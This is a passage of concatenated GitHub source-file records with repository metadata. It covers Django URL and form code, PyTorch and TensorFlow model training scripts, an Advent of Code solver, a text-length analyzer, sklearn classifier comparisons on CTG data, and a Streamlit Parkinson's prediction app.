name='organizer_tag_create'),\n    re_path(r'^tag/(?P<slug>[\\w\\-]+)/update/$', TagUpdate.as_view(), name='organizer_tag_update'),\n    re_path(r'^tag/(?P<slug>[\\w\\-]+)/$', tag_detail, name='organizer_tag_detail'),\n    re_path(r'^tag/(?P<slug>[\\w-]+)/delete/$', TagDelete.as_view(), name='organizer_tag_delete'),\n]\n","repo_name":"3douhao/unleashed","sub_path":"organizer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"285673016","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom src.helper import get_optimizer, tensorsFromPair, get_languages, tensorFromWord, get_data\nfrom src.language import SOS_token, EOS_token\nfrom src.encoder import Encoder\nfrom src.decoder import Decoder\nimport random\nimport time\nimport numpy as np\n\nPRINT_EVERY = 5000\nPLOT_EVERY = 100\n\nclass Translator:\n    def __init__(self, lang: str, params: dict, device: str):\n        self.lang = lang\n        self.input_lang, self.output_lang, self.pairs = get_languages(self.lang)\n        self.input_size = self.input_lang.n_chars\n        self.output_size = self.output_lang.n_chars\n        self.device = device\n\n        self.training_pairs = [tensorsFromPair(self.input_lang, self.output_lang, pair, self.device) for pair in self.pairs]\n\n        self.encoder = Encoder(in_sz = self.input_size,\n                               embed_sz = params[\"embed_size\"],\n                               hidden_sz = params[\"hidden_size\"],\n                               cell_type = params[\"cell_type\"],\n                               n_layers = params[\"num_layers\"],\n                               dropout = params[\"dropout\"],\n                               device=self.device).to(self.device)\n        \n        self.decoder = Decoder(out_sz = self.output_size,\n                               embed_sz = params[\"embed_size\"],\n                               hidden_sz = params[\"hidden_size\"],\n                               cell_type = params[\"cell_type\"],\n                               n_layers = params[\"num_layers\"],\n                               dropout = params[\"dropout\"],\n                               device=self.device).to(self.device)\n\n        self.encoder_optimizer = get_optimizer(params[\"optimizer\"])(self.encoder.parameters(), lr=params[\"learning_rate\"])\n        self.decoder_optimizer = get_optimizer(params[\"optimizer\"])(self.decoder.parameters(), lr=params[\"learning_rate\"])\n        \n        self.criterion = nn.NLLLoss()\n\n        self.teacher_forcing_ratio = params[\"teacher_forcing_ratio\"]\n        self.max_length = params[\"max_length\"]\n\n    def train_single(self, input_tensor, target_tensor):\n        encoder_hidden = self.encoder.initHidden()\n        encoder_cell = self.encoder.initHidden()\n\n        self.encoder_optimizer.zero_grad()\n        self.decoder_optimizer.zero_grad()\n\n        input_length = input_tensor.size(0)\n        target_length = target_tensor.size(0)\n\n        encoder_outputs = torch.zeros(self.max_length, self.encoder.hidden_sz, device=self.device)\n\n        loss = 0\n\n        for ei in range(input_length):\n            encoder_output, encoder_hidden, encoder_cell = self.encoder(input_tensor[ei], encoder_hidden, encoder_cell)\n            encoder_outputs[ei] = encoder_output[0, 0]\n\n        decoder_input = torch.tensor([[SOS_token]], device=self.device)\n        decoder_hidden, decoder_cell = encoder_hidden, encoder_cell\n\n        use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\n\n        if use_teacher_forcing:\n            for di in range(target_length):\n                decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n                loss += self.criterion(decoder_output, target_tensor[di])\n\n                decoder_input = target_tensor[di]\n        else:\n            for di in range(target_length):\n                decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n                loss += self.criterion(decoder_output, 
target_tensor[di])\n\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach()\n if decoder_input.item() == EOS_token:\n break\n\n loss.backward()\n self.encoder_optimizer.step()\n self.decoder_optimizer.step()\n\n return loss.item() / target_length\n \n def train(self, iters=-1):\n start_time = time.time()\n plot_losses = []\n print_loss_total = 0\n plot_loss_total = 0\n\n random.shuffle(self.training_pairs)\n iters = len(self.training_pairs) if iters == -1 else iters\n\n for iter in range(1, iters+1):\n training_pair = self.training_pairs[iter - 1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n\n loss = self.train_single(input_tensor, target_tensor)\n print_loss_total += loss\n plot_loss_total += loss\n\n if iter % PRINT_EVERY == 0:\n print_loss_avg = print_loss_total / PRINT_EVERY\n print_loss_total = 0\n current_time = time.time()\n print(\"Loss: {:.4f} | Iterations: {} | Time: {:.3f}\".format(print_loss_avg, iter, current_time - start_time))\n\n if iter % PLOT_EVERY == 0:\n plot_loss_avg = plot_loss_total / PLOT_EVERY\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n \n return plot_losses\n \n def evaluate(self, word):\n with torch.no_grad():\n input_tensor = tensorFromWord(self.input_lang, word, self.device)\n input_length = input_tensor.size()[0]\n encoder_hidden = self.encoder.initHidden()\n encoder_cell = self.encoder.initHidden()\n\n encoder_outputs = torch.zeros(self.max_length, self.encoder.hidden_sz, device=self.device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(input_tensor[ei], encoder_hidden, encoder_cell)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=self.device)\n decoder_hidden, decoder_cell = encoder_hidden, encoder_cell\n\n decoded_chars = \"\"\n\n for di in range(self.max_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n \n if topi.item() == EOS_token:\n break\n else:\n decoded_chars += self.output_lang.index2word[topi.item()]\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_chars\n \n def test_validate(self, type:str):\n pairs = get_data(self.lang, type)\n accuracy = np.sum([self.evaluate(pair[0]) == pair[1] for pair in pairs])\n return accuracy / len(pairs)","repo_name":"bersilin-robert1609/CS6910-Assignment3","sub_path":"src/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8312146210","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n# plt.ion()\r\n\r\n\r\ndef read_files(file_dir, n_data_set):\r\n # list initialization\r\n cat_data = []\r\n dog_data = []\r\n cat_label = []\r\n dog_label = []\r\n\r\n valid_format = [\".jpg\"]\r\n\r\n # read cat images\r\n for file in os.listdir(file_dir + \"\\\\Cat\"):\r\n ext = os.path.splitext(file)[1]\r\n if ext.lower() not in valid_format:\r\n continue\r\n cat_data.append(file_dir + \"\\\\Cat\\\\\" + file)\r\n cat_label.append(0)\r\n if len(cat_label) >= n_data_set:\r\n break\r\n\r\n # read dog images\r\n for file in os.listdir(file_dir + \"\\\\Dog\"):\r\n ext = os.path.splitext(file)[1]\r\n if ext.lower() not in valid_format:\r\n continue\r\n dog_data.append(file_dir + \"\\\\Dog\\\\\" + file)\r\n dog_label.append(1)\r\n if len(dog_label) >= 
n_data_set:\r\n break\r\n\r\n image_list = np.hstack((cat_data, dog_data))\r\n label_list = np.hstack((cat_label, dog_label))\r\n\r\n data_array = np.array([image_list, label_list]).transpose()\r\n np.random.shuffle(data_array)\r\n\r\n image_list = list(data_array[:, 0])\r\n label_list = list(data_array[:, 1])\r\n label_list = [int(i) for i in label_list]\r\n\r\n return image_list, label_list\r\n\r\n\r\ndef get_batch(image, label, width, height, batch_size):\r\n image = tf.cast(image, tf.string)\r\n label = tf.cast(label, tf.int32)\r\n\r\n train_input_queue = tf.train.slice_input_producer([image, label], shuffle=False)\r\n image_content = tf.read_file(train_input_queue[0])\r\n image = tf.image.decode_jpeg(image_content, channels=3)\r\n image = tf.image.resize_image_with_crop_or_pad(image, target_width=width, target_height=height)\r\n image = tf.image.per_image_standardization(image)\r\n label = train_input_queue[1]\r\n image_batch, label_batch = tf.train.batch([image, label], batch_size=batch_size)\r\n label_batch = tf.reshape(label_batch, [batch_size])\r\n\r\n return image_batch, label_batch\r\n\r\n\r\n\r\ndef inference (image, batch_size, n_class):\r\n with tf.variable_scope('conv_layer1') as scope:\r\n w = tf.get_variable('weights',\r\n shape=[3, 3, 3, 16],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\r\n b = tf.get_variable('biases',\r\n shape=[16],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n conv1 = tf.nn.conv2d(image, w,\r\n strides=[1, 1, 1, 1],\r\n padding='SAME')\r\n conv1 = tf.nn.bias_add(conv1, b)\r\n output1 = tf.nn.relu(conv1, name=scope.name)\r\n\r\n with tf.variable_scope('pooling_layer1') as scope:\r\n pooling1 = tf.nn.max_pool(output1,\r\n ksize=[1, 3, 3, 1],\r\n strides=[1, 2, 2, 1],\r\n padding='SAME')\r\n\r\n with tf.variable_scope('conv_layer2') as scope:\r\n w2 = tf.get_variable('weights',\r\n shape=[3, 3, 16, 16],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.1, dtype=tf.float32))\r\n b2 = tf.get_variable('biases',\r\n shape=[16],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n conv2 = tf.nn.conv2d(pooling1, w2,\r\n strides=[1, 1, 1, 1],\r\n padding='SAME')\r\n conv2 = tf.nn.bias_add(conv2, b2)\r\n output2 = tf.nn.relu(conv2)\r\n\r\n with tf.variable_scope('pooling_layer2') as scope:\r\n pooling2 = tf.nn.max_pool(output2,\r\n ksize=[1, 3, 3, 1],\r\n strides=[1, 2, 2, 1],\r\n padding='SAME')\r\n\r\n with tf.variable_scope('fully_connected1') as scope:\r\n output2_flat = tf.reshape(pooling2, shape=[batch_size, -1])\r\n dim = output2_flat.get_shape()[1].value\r\n w3 = tf.get_variable('weights',\r\n shape=[dim, 128],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n b3 = tf.get_variable('biases',\r\n shape=[128],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n output3 = tf.nn.relu(tf.matmul(output2_flat, w3) + b3)\r\n\r\n with tf.variable_scope('fully_connected2') as scope:\r\n w4 = tf.get_variable('weights',\r\n shape=[128, 128],\r\n dtype=tf.float32,\r\n initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n b4 = tf.get_variable('biases',\r\n shape=[128],\r\n dtype=tf.float32,\r\n initializer=tf.constant_initializer(0.1))\r\n output4 = tf.nn.relu(tf.add(tf.matmul(output3, w4), b4))\r\n\r\n with tf.variable_scope('final_result') as scope:\r\n w5 = tf.get_variable('weights',\r\n shape=[128, n_class],\r\n dtype=tf.float32,\r\n 
initializer=tf.truncated_normal_initializer(stddev=0.005, dtype=tf.float32))\r\n        b5 = tf.get_variable('biases',\r\n                             shape=[n_class],\r\n                             dtype=tf.float32,\r\n                             initializer=tf.constant_initializer(0.1))\r\n        output5 = tf.add(tf.matmul(output4, w5), b5)\r\n\r\n    return output5\r\n\r\ndef loss_func(logits, labels):\r\n    with tf.variable_scope('loss') as scope:\r\n        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels)\r\n        cross_entropy = tf.reduce_mean(cross_entropy)\r\n        return cross_entropy\r\n\r\ndef training(loss, learning_rate):\r\n    with tf.name_scope('optimizer') as scope:\r\n        optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n        global_step = tf.Variable(0, trainable=False)\r\n        optimizer = optimizer.minimize(loss, global_step=global_step)\r\n    return optimizer\r\n\r\n\r\ndef evaluation(logits, labels):\r\n    with tf.variable_scope('accuracy') as scope:\r\n        correct = tf.nn.in_top_k(logits, labels, 1)\r\n        correct = tf.cast(correct, tf.float32)\r\n        accuracy = tf.reduce_mean(correct)\r\n    return accuracy\r\n\r\n\r\n\r\nBatch_size = 8\r\nWidth = 150\r\nHeight = 150\r\nn_data_set = 80\r\nn_class = 2\r\nmax_step = 15000\r\nlearning_rate = 0.0001\r\n\r\n\r\ndef run_training():\r\n    train_data_dir = \"C:\\\\Users\\\\lyf58\\\\PycharmProjects\\\\CatVsDog\\\\catDog\"\r\n\r\n    image_list, label_list = read_files(train_data_dir, n_data_set)\r\n    image_batch, label_batch = get_batch(image_list,\r\n                                         label_list,\r\n                                         Width,\r\n                                         Height,\r\n                                         Batch_size)\r\n\r\n    train_logits = inference(image_batch, Batch_size, n_class)\r\n    train_loss = loss_func(train_logits, label_batch)\r\n    train_optimizer = training(train_loss, learning_rate)\r\n    train_accuracy = evaluation(train_logits, label_batch)\r\n\r\n    with tf.Session() as sess:\r\n\r\n        sess.run(tf.global_variables_initializer())\r\n\r\n        coord = tf.train.Coordinator()\r\n        threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n        try:\r\n            for step in np.arange(max_step):\r\n                if coord.should_stop():\r\n                    break\r\n                _, tra_loss, tra_acc = sess.run([train_optimizer, train_loss, train_accuracy])\r\n\r\n                if step % 20 == 0:\r\n                    print(step, tra_loss, tra_acc)\r\n\r\n        except tf.errors.OutOfRangeError:\r\n            print(\"error\")\r\n        finally:\r\n            coord.request_stop()\r\n\r\n        coord.join(threads)\r\n        sess.close()\r\n\r\n\r\n\r\nrun_training()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yufan88/Neural-Networks","sub_path":"singleLayerTestFile/imageClassification.py","file_name":"imageClassification.py","file_ext":"py","file_size_in_byte":8321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8731726861","text":"#coding:utf-8\nfrom django import forms\n\nimage = forms.ImageField(required=False)\n\nclass ContactForm(forms.Form):\n    subject = forms.CharField(max_length=100)\n    email = forms.EmailField(required=False, label=\"E-mail\")\n    message = forms.CharField(widget=forms.Textarea)\n\n    def clean_message(self):\n        message = self.cleaned_data['message']\n        num_words = len(message.split()) # for Chinese text, use len(message) instead\n        if num_words < 4:\n            raise forms.ValidationError(\"Not enough words!\")\n        return 
message\n","repo_name":"vose2008/Learn","sub_path":"django/The_django_book/mysite/books/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43408032832","text":"with open(\"input.txt\", \"r\") as input_file:\n lines = input_file.read().strip().split(\"\\n\")\n\npoints = [(int(x), int(y)) for x, y in (l.split(',') for l in lines if ',' in l)]\n\nmax_x = max(x for x, _ in points)\nmax_y = max(y for _, y in points)\n\ngrid = [['.' for _ in range(max_x + 1)] for _ in range(max_y + 1)]\n\ndef print_grid():\n dots = 0\n\n for y in range(max_y + 1):\n for x in range(max_x + 1):\n print(grid[y][x], end='')\n if grid[y][x] == '#':\n dots += 1\n print()\n print()\n return dots\n\nfor x, y in points:\n grid[y][x] = '#'\n\ndef fold_y(fold_axis):\n global max_y\n for y in range(fold_axis):\n for x in range(max_x + 1):\n if grid[max_y - y][x] == '#':\n grid[y][x] = grid[max_y - y][x]\n max_y = fold_axis - 1\n\ndef fold_x(fold_axis):\n global max_x\n for x in range(fold_axis):\n for y in range(max_y + 1):\n if grid[y][max_x - x] == '#':\n grid[y][x] = grid[y][max_x - x]\n max_x = fold_axis - 1\n\nfold_x(655)\nfold_y(447)\nfold_x(327)\nfold_y(223)\nfold_x(163)\nfold_y(111)\nfold_x(81)\nfold_y(55)\nfold_x(40)\nfold_y(27)\nfold_y(13)\nfold_y(6)\ndots = print_grid()\nprint(f'Dots: ${dots}')\n\n# HEJHJRCJ","repo_name":"jakubka/advent-of-code-2021","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32189667417","text":"import syllables\n\n\ndef find_long_sentences(document):\n long_sentences = []\n for item in list(document.sents):\n word_count = len(item)\n for i in item:\n if i.is_punct:\n word_count -= 1\n if word_count >= 17:\n sentence = dict()\n sentence[\"text\"] = item.text\n sentence[\"index\"] = item.start_char\n sentence[\"length\"] = item.end_char - item.start_char\n long_sentences.append(sentence)\n return long_sentences\n\n\ndef find_long_words(document):\n long_words = []\n for token in document:\n if syllables.estimate(token.text) >= 4:\n long_word = dict()\n long_word[\"text\"] = token.text\n long_word[\"index\"] = token.idx\n long_word[\"length\"] = len(token.text)\n long_words.append(long_word)\n return long_words\n\n\ndef get_long_texts(document):\n long_sentences = find_long_sentences(document)\n long_words = find_long_words(document)\n long_texts = dict()\n long_texts[\"long_sentences\"] = long_sentences\n long_texts[\"long_words\"] = long_words\n return long_texts","repo_name":"rreynolds46/emailanalyzer","sub_path":"Utilities/long_text_finder.py","file_name":"long_text_finder.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41743831876","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 26 14:33:42 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection 
import StratifiedKFold\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndef prep(dataset):\r\n #dataset = dataset.drop([\"FileName\",\"Date\",\"SegFile\",\"b\",\"e\",\"DR\"],axis=1)\r\n print(\"========= Head =========\")\r\n print(dataset.head())\r\n print(\"========= Column =========\")\r\n print(dataset.columns)\r\n print(\"========= Shape =========\")\r\n print(dataset.shape)\r\n print(\"========= Missing Values =========\")\r\n print(dataset.isnull().sum())\r\n dataset = dataset.dropna() \r\n print(\"========= Data Type =========\")\r\n print(dataset.dtypes)\r\n return dataset\r\n\r\ndef preproses_minmax(data):\r\n from sklearn.preprocessing import MinMaxScaler\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n rescaledX = scaler.fit_transform(data)\r\n return rescaledX\r\n \r\n \r\ndef preproses_standarize(data):\r\n from sklearn.preprocessing import StandardScaler\r\n scaler = StandardScaler().fit(data)\r\n rescaledX = scaler.transform(data)\r\n return rescaledX\r\n\r\ndef holdout(X,y,test):\r\n from sklearn.model_selection import train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test, random_state=0)\r\n return X_train, X_test, y_train, y_test\r\n\r\ndef klasifikasi_kfold(X,y):\r\n \r\n run_kfold = pd.DataFrame({},columns=['Model','Fold','Akurasi']) \r\n\r\n def hasil(expected,predicted,nama,i):\r\n print(\"========== {} - Fold - {} ==========\".format(nama,i))\r\n print(metrics.confusion_matrix(expected,predicted))\r\n print(metrics.classification_report(expected,predicted))\r\n print(\"Accuracy = {}\".format(accuracy_score(expected, predicted)))\r\n \r\n i = 1\r\n skf = StratifiedKFold(n_splits=3)\r\n for train,test in skf.split(X,y):\r\n X_train, X_test, y_train, y_test = X[train],X[test],y[train],y[test]\r\n \r\n #Logistic Regression\r\n model = LogisticRegression(max_iter=10000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Logistic Regression\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Logistic Regression\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Decision Tree\r\n model = DecisionTreeClassifier()\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"Decision Tree\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Decision Tree\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #MLPClassifier\r\n model = MLPClassifier(activation='logistic', solver='lbfgs', alpha = 1e-5, \r\n hidden_layer_sizes=(16,14), random_state=0,max_iter=100000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"MLP Classifier\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"MLPClassifier\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #SVM\r\n model = SVC(kernel='linear',random_state=0)\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"SVM\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"SVM\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Random Forest\r\n model = RandomForestClassifier(n_estimators=2000,criterion='entropy',random_state=0)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Random Forest\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Random 
Forest\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #Naive Bayes\r\n model = GaussianNB()\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Gaussian Naive Bayes\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"Naive Bayes\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n \r\n #KNN\r\n model = KNeighborsClassifier(n_neighbors=3)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"KNN\",i)\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run_kfold = run_kfold.append({'Model':\"KNN\",'Fold':i,'Akurasi':Acc},ignore_index=True)\r\n i=i+1\r\n \r\n return run_kfold\r\n\r\ndef klasifikasi(X,y):\r\n \r\n run = pd.DataFrame({},columns=['Model','Akurasi']) \r\n def hasil(expected,predicted,nama):\r\n print(\"========== {} ==========\".format(nama))\r\n print(metrics.confusion_matrix(expected,predicted))\r\n print(metrics.classification_report(expected,predicted))\r\n\r\n X_train,X_test,y_train,y_test = holdout(X,y,0.2)\r\n \r\n #Logistic Regression\r\n model = LogisticRegression(max_iter=10000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Logistic Regression\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Logistic Regression\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Decision Tree\r\n model = DecisionTreeClassifier()\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"Decision Tree\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Decision Tree\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #MLPClassifier\r\n model = MLPClassifier(activation='logistic', solver='lbfgs', alpha = 1e-5, \r\n hidden_layer_sizes=(16,14), random_state=0,max_iter=100000)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"MLP Classifier\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"MLPClassifier\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #SVM\r\n model = SVC(kernel='linear',random_state=0)\r\n model.fit(X_train,y_train)\r\n hasil(y_test,model.predict(X_test),\"SVM\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"SVM\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Random Forest\r\n model = RandomForestClassifier(n_estimators=2000,criterion='entropy',random_state=0)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Random Forest\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Random Forest\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #Naive Bayes\r\n model = GaussianNB()\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"Gaussian Naive Bayes\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"Naive Bayes\",'Akurasi':Acc},ignore_index=True)\r\n \r\n #KNN\r\n model = KNeighborsClassifier(n_neighbors=3)\r\n model.fit(X_train, y_train)\r\n hasil(y_test,model.predict(X_test),\"KNN\")\r\n Acc = accuracy_score(y_test, model.predict(X_test))\r\n run = run.append({'Model':\"KNN\",'Akurasi':Acc},ignore_index=True)\r\n \r\n return run\r\n \r\ndef feature_PCA(X):\r\n pca = PCA(n_components=21) #Coba-coba n_components nya\r\n principalComponents = pca.fit_transform(X)\r\n variance_ratio = pca.explained_variance_ratio_\r\n print(variance_ratio)\r\n return principalComponents\r\n\r\n\r\nrun = pd.DataFrame({},columns=['Model','Akurasi']) \r\nrun_kfold = 
pd.DataFrame({},columns=['Model','Fold','Akurasi']) \r\ndf = pd.read_csv(\"CTG.csv\")\r\ndf = df.replace('?',np.nan)\r\ndf = prep(df)\r\n\r\n#3 Class Classification\r\nfitur = ['AC','FM','UC','DL','DS','DP','LB','ASTV','MSTV','ALTV','MLTV','Width','Min','Max','Nmax',\r\n 'Nzeros','Mode','Mean','Median','Variance','Tendency']\r\nX = np.array(df[fitur])\r\ny = np.array(df['NSP'])\r\n\r\n#Preproses\r\nX = preproses_minmax(X) #MinMax\r\n#X = preproses_standarize(X) #StandardScaler\r\n\r\n#X = feature_PCA(X)\r\n\r\n#Classification\r\nrun = klasifikasi(X,y)\r\nrun_kfold = klasifikasi_kfold(X,y)\r\n\r\n","repo_name":"pradistaa/compared-machinelearning-algorithm-fetalheartrate-classification","sub_path":"TA.py","file_name":"TA.py","file_ext":"py","file_size_in_byte":8457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14625441621","text":"import viewA\nimport datbaseA\ndef main():\n while True:\n op = viewA.get_op()\n if op == 1:\n data_worker = viewA.get_data()\n datbaseA.add_data(data_worker)\n if op == 2:\n find_str = viewA.find_person()\n datbaseA.find_person(find_str)\n if op == 3:\n worker = viewA.find_person()\n user_lst, full_lst = datbaseA.select_data_person(worker)\n num_line = viewA.choose_str()\n datbaseA.delete_data_person(user_lst, full_lst, num_line)\n if op == 4:\n worker = viewA.find_person()\n user_lst, full_lst = datbaseA.select_data_person(worker)\n num_line = viewA.choose_str()\n data_worker = viewA.get_data()\n datbaseA.change_data_person(user_lst, full_lst, num_line, data_worker)\n if op == 5:\n print(\"Выход\")\n break\n\n","repo_name":"RomZorro/GB_Python","sub_path":"HW8_200323_Artur_variant/controlleA.py","file_name":"controlleA.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7441936596","text":"import streamlit as st\nimport pandas as pd\nfrom catboost import CatBoostClassifier\nimport pickle\n\n# loading the saved models\nparkinsons_model = pickle.load(open(r'parkinsons_model1.pkl', 'rb'))\n\nst.write(\"\"\"\n# Simple Parkinson Prediction App\nThis app predicts if a patient has Parkinson's Disease!\n\"\"\")\n\n# CSV file upload\nuploaded_file = st.sidebar.file_uploader(\"Upload your input CSV file\", type=[\"csv\"])\n\nif uploaded_file is not None:\n input_df = pd.read_csv(uploaded_file)\n\n # predictions\n predictions = parkinsons_model.predict(input_df)\n input_df['Prediction'] = predictions\n\n # show predictions\n st.write(input_df)\n\n\n# show form\nst.title(\"Parkinson's Disease Prediction using ML\")\n\ncol1, col2, col3, col4= st.columns(4) \n\nwith col1:\n fo = st.slider('MDVP:Fo(Hz)', -1.0, 1.0, -1.0)\n RAP = st.slider('MDVP:RAP', -1.0, 1.0, -1.0)\n HNR = st.slider('HNR', -1.0, 1.0, 1.0)\n spread2 = st.slider('spread2', -1.0, 1.0, -1.0)\n \nwith col2:\n fhi = st.slider('MDVP:Fhi(Hz)', -1.0, 1.0, -1.0)\n APQ3 = st.slider('Shimmer:APQ3', -1.0, 1.0, -1.0)\n RPDE = st.slider('RPDE', -1.0, 1.0, -1.0)\n D2 = st.slider('D2', -1.0, 1.0, -1.0)\n \nwith col3:\n flo = st.slider('MDVP:Flo(Hz)', -1.0, 1.0, 1.0)\n APQ = st.slider('MDVP:APQ', -1.0, 1.0, 0.0)\n DFA = st.slider('DFE', -1.0, 1.0, 1.0)\n \nwith col4:\n Jitter_Abs = st.slider('MDVP:Jitter(Abs)', -1.0, 1.0, 0.0)\n NHR = st.slider('NHR', -1.0, 1.0, -1.0)\n spread1 = st.slider('spread1', -1.0, 1.0, -1.0)\n \n\n# predict\nif st.button(\"Parkinson's Test Result\"):\n features = [[fo, fhi, flo, Jitter_Abs, 
